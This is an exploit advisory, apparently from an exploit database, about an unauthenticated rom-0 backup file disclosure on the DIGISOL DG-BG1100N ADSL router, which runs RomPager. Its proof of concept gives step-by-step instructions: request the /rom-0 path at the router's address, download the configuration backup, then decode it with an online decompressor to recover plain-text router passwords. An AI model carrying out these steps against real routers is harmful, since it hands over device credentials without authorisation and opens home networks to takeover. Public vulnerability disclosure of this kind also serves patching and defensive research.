DIGISOL DG-BG1100N suffers from a ROM-0 backup disclosure vulnerability.
0a0fbe11323fb171cf44fe97f8d9d71c
# Exploit Title : ROM-0 Backup File Disclosure on DIGISOL
# Date : 24-08-2017
# Exploit Author : Sudin nk
# Vendor Homepage: http://www.digisol.com
# Tested Routers : DG-BG1100N ADSL 2/2+ Modem Wifi Router
# Tested on : Parrotsec x86_64
ROM-0 Backup File Disclosure on DIGISOL
__________________________________________________________________________________________
____________________________
A dangerous vulnerability present on many network devices which are using
RomPager.The rom-0 file contains sensitive information such as the router password.
There is a disclosure in which anyone can download that file without any authentication by
a simple GET request.
POC:
> open the router IP address in your web browser, http://192.168.1.1
> Now add /rom-0 to your target address.Then a rom-0 file will be downloaded
http://192.168.1.1/rom-0
> You can find the router password using rom-0 configuration decompressor.
Here i used the website http://www.routerpwn.com/zynos/ for decompression.Once it decoded
you can get plain text passwords
Thank You.
Regards,
Sudin nk